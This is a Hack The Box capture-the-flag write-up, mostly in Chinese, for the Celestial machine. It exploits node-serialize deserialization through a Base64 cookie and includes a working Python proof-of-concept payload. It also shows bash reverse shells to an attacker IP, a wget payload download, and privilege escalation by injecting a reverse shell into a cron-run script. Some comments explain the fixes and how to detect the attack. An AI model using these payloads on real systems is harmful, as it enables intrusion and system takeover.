Celestial (Hack The Box Writeup)


  • URL : https://app.hackthebox.eu/machines/130
  • IP : 10.129.217.35

Recon

  • 掃 Port
    • nmapAutomator.sh -H 10.129.217.35 -t recon
  • 掃路徑
  • 首頁 404
  • 發現有餅乾
  • F5 後
    • 發現餅乾(Cookie `profile`)是 Base64 編碼的序列化 JSON(Serialize)

Serialize

import requests
import base64

# Baseline probe: replay a well-formed `profile` cookie and print the page the
# application renders for it.
TARGET_URL = 'http://10.129.217.35:3000/'

# The cookie is plain JSON wrapped in Base64. The later tests on this page show
# edited values being accepted, so every field should be treated as
# client-controlled input on the server side.
src = b'{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}'
cookies = dict(profile=base64.b64encode(src).decode('ascii'))

# Browser-like request headers copied from the original capture.
browser_headers = dict([
    ('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'),
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
    ('Accept-Language', 'en-US,en;q=0.5'),
    ('Connection', 'keep-alive'),
    ('Upgrade-Insecure-Requests', '1'),
    ('If-None-Match', 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"'),
    ('Cache-Control', 'max-age=0'),
])

response = requests.get(TARGET_URL, headers=browser_headers, cookies=cookies)
print(response.text)

亂戳

{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": true}

會回傳

Hey meow true + true is 2

{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": []}

會回傳

Hey meow  +  is undefined

eval("A")

會噴錯
錯誤中有提到

SyntaxError: Unexpected token e<br> &nbsp; &nbsp;at Object.parse (native)<br> &nbsp; &nbsp;at Object.exports.unserialize (/home/sun/node_modules/node-serialize/lib/serialize.js
  • Google node-serialize exploit
  • https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf

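透過 IIFE 來達成 RCE:node-serialize 的 unserialize() 會把帶有 `_$$ND_FUNC$$_` 前綴的字串還原成函式,若字串結尾再接上 `()`,函式在反序列化當下就會被執行。根本原因是伺服器把使用者可控的 Cookie 直接交給 unserialize();修補方式是改用 JSON.parse 並驗證欄位,不要反序列化不受信任的資料。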

// Local test object: `rce` is an ordinary function that lists `/` through
// child_process.exec. No comments are placed inside the function body on
// purpose, because the serialized form printed below embeds the function's
// source text verbatim.
var y = {
    rce : function(){
    require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });
    },
   }

// node-serialize writes functions out as strings tagged with `_$$ND_FUNC$$_`
// (see the printed output). That tag is what lets unserialize() turn data back
// into code, so client-controlled input must never reach unserialize(); plain
// JSON.parse plus field validation is the safe replacement.
var serialize = require('node-serialize'); 
console.log("Serialized: \n" + serialize.serialize(y));
{"rce":"_$$ND_FUNC$$_function(){\n    require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n    }"}
// Local test of the immediately-invoked form, using the same field names as the
// application's profile cookie.
// NOTE(review): the trailing `()` after the function expression is evaluated
// while this object literal is being built, so the command runs here and `rce`
// ends up holding the call's return value (undefined, since the body has no
// `return`) rather than a function. The unserialize() call at the bottom
// therefore does not appear to exercise the deserialization path by itself; the
// serialized string shown under "Exploit" carries the `()` inside the
// `_$$ND_FUNC$$_` string instead.
var y = {
    rce : function(){
    require('child_process').exec('id', function(error, stdout, stderr) { console.log(stdout) });}(),
    username: "meow" ,
    country:"Idk Probably Somewhere Dumb",
    city :"Lametown",
    // num: 2,
   }

var serialize = require('node-serialize'); 
// Disabled: would print the serialized object Base64-encoded.
// console.log("Serialized: \n" + Buffer.from(serialize.serialize(y)).toString('base64'));

// Round trip through node-serialize: serialize, then feed the result straight
// back into unserialize().
var s = serialize.serialize(y);

// console.log(s)

// Defensive takeaway: unserialize() is the dangerous sink. Anything that reaches
// it from a cookie, header or request body should be parsed with JSON.parse and
// validated instead.
serialize.unserialize(s)
  • 戳 Reverse shell
    • bash -c 'bash -i >& /dev/tcp/10.10.16.35/7877 0>&1'

Exploit

  • 完整 Payload
    • src = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('wget 10.10.16.35', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
import requests
import base64


# Proof of concept for the lab machine: the `profile` cookie carries an extra
# `rce` field whose value uses node-serialize's `_$$ND_FUNC$$_` function tag.
#
# Root cause (server side): the application hands the decoded cookie to
# node-serialize's unserialize(), as the stack trace earlier on this page shows.
# Fix: parse the cookie with JSON.parse, validate each field, and sign the cookie
# so that tampering is rejected.
# Detection idea: Base64-decode `profile` cookies in proxy or application logs
# and flag any value containing the `_$$ND_FUNC$$_` marker.
TARGET_URL = 'http://10.129.217.35:3000/'

cmd = "wget 10.10.16.35"

# The payload is kept as two literal halves around `cmd`; the bytes are the same
# as the single concatenated string used in the original script.
payload_head = """{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2","rce":"_$$ND_FUNC$$_function (){require('child_process').exec('"""
payload_tail = """', function(error, stdout, stderr) { console.log(stdout) });}()"}"""
src = (payload_head + cmd + payload_tail).encode('ascii')

cookies = dict(profile=base64.b64encode(src).decode('ascii'))

# Browser-like request headers copied from the original capture.
browser_headers = dict([
    ('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'),
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
    ('Accept-Language', 'en-US,en;q=0.5'),
    ('Connection', 'keep-alive'),
    ('Upgrade-Insecure-Requests', '1'),
    ('If-None-Match', 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"'),
    ('Cache-Control', 'max-age=0'),
])

response = requests.get(TARGET_URL, headers=browser_headers, cookies=cookies)
print(response.text)
  • 就成功 RCE ㄌ
    • wget 10.10.16.35/s_HTB -O /tmp/s
    • 放 Reverse shell
  • 戳回來

提權

  • python -c 'import pty; pty.spawn("/bin/bash")'
  • 發現家目錄有 output.txt
  • 跑豌豆(linPEAS)
      • 找到一個 Cronjob
  • 觀察 output.txt
  • 尋找 Script is running 在哪
    • grep -rnw '/' -e 'Script is running...' 2>/dev/null
  • 找到 user flag
  • script 是 cron job 每 5 分鐘跑一次,且我們可以修改(排程以較高權限執行我們可寫的檔案,這就是提權的根本原因;修補方式是讓該 script 只有執行它的帳號可寫)
  • 戳 reverse shell
    • echo "import os" > script.py
    • echo "os.system(\"bash -c 'bash -i >& /dev/tcp/10.10.16.35/7878 0>&1'\")" >> script.py
  • 收 Reverse shell